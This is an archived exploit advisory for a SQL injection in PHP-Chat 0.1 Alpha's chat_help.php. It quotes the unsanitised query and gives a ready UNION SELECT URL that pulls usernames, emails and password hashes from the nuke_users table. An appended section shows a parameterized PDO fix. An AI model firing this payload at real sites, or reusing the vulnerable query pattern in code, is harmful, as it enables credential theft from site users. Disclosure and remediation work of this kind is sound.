ZeroCold

PHP-Chat 0.1 Alpha SQL Injection


/////////////////////////////////////////////////////////////////
// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// [2009-09-22] PHP-Chat 0.1 Alpha SQL Injection
// http://r00tsecurity.org/db/exploits/290
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// GENERATED ON: 2009-12-01 | 00:46:38
/////////////////////////////////////////////////////////////////


EXPLOIT INFO
PHP-Chat is based purely on PHP/MySQL which means I don't use any other technology such as Java or Javascript. The Chat will be released as both a stand-alone and a PHP-Nuke version.

http://sourceforge.net/projects/php-chat

The exploit is located in the file chat_help.php, where $HTTP_GET_VARS[command] is passed directly to MySQL without first being sanitized:
[]
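// Request parameter is interpolated into the SQL string unescaped (vulnerable as published)
$query = "SELECT * FROM `" . $table_prefix . "chathelp` WHERE `id` = '$HTTP_GET_VARS[command]' LIMIT 1";
// On failure the full query text is echoed back to the client
$result = mysql_query($query) or die("$query failed!");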
$row = mysql_fetch_row($result);
[]

EXPLOIT
http://www.site.com/php-chat/chat_help.php?command=-1'+UNION+SELECT+1,concat(user_id,username,user_email,user_password),3,4+FROM+nuke_users/*

// http://r00tsecurity.org/db/exploits/290
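
A hardened form of the chat_help.php lookup quoted above, as an added example that is not part of the original advisory or of PHP-Chat's own code. It assumes PDO with an in-memory SQLite database standing in for MySQL; the function name `help_lookup`, the `nuke_` prefix on the help table, the columns other than `id`, and the sample row are all constructed for illustration.

```php
<?php
// Added example: parameterized replacement for the vulnerable query.
// Assumptions: SQLite in memory stands in for MySQL; help_lookup(), the
// 'nuke_' prefix and the sample row are hypothetical, not PHP-Chat's own.

function help_lookup(PDO $db, string $table_prefix, string $command): ?array
{
    // Identifiers cannot be bound as parameters, so allow-list the prefix.
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $table_prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // The id is bound, never concatenated: quotes and UNION stay plain data.
    $stmt = $db->prepare(
        'SELECT * FROM `' . $table_prefix . 'chathelp` WHERE `id` = ? LIMIT 1'
    );
    $stmt->execute([$command]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
// Failures raise exceptions instead of echoing the query text the way the
// original die("$query failed!") does.
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE nuke_chathelp (id TEXT, title TEXT, body TEXT, ord INTEGER)');
$db->exec("INSERT INTO nuke_chathelp VALUES ('1', 'join', 'Constructed help text', 1)");

// Constructed inputs: a normal id and a quote-breaking UNION string.
$inputs = ['1', "-1' UNION SELECT 1,2,3,4/*"];
foreach ($inputs as $command) {
    $row = help_lookup($db, 'nuke_', $command);
    echo var_export($command, true), ' => ',
         $row === null ? 'no row' : json_encode($row), PHP_EOL;
}
```

The first input returns the stored help row; the second is compared against `id` as a literal string and matches nothing, so the injected UNION never reaches the SQL parser.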
